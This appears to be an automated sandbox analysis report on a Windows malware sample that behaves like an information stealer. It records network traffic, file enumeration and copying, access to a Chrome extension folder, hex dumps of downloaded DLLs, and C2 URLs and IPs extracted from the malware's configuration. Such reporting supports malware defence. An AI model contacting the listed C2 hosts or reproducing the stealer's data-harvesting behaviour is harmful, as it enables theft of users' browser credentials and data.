Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64267 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64269 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64272 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64280 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64281 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64288 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64287 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64305 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64308 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64323 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64329 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64330 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64331 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64334 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64333 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64336 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64339 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64338 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64342 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64346 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64353 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64354 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64357 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64358 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64359 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64360 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64361 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64365 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64366 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64367 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64369 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64372 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64373 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64377 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004139B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004143F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	0_2_00414050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004133C0

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 0MB later: 95MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor	URLs: http://85.28.47.31silence
Source: Malware configuration extractor	IPs: 185.215.113.19

Source: unknown

Network traffic detected: DNS query count 62

Source: global traffic

TCP traffic: 192.168.2.5:64037 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 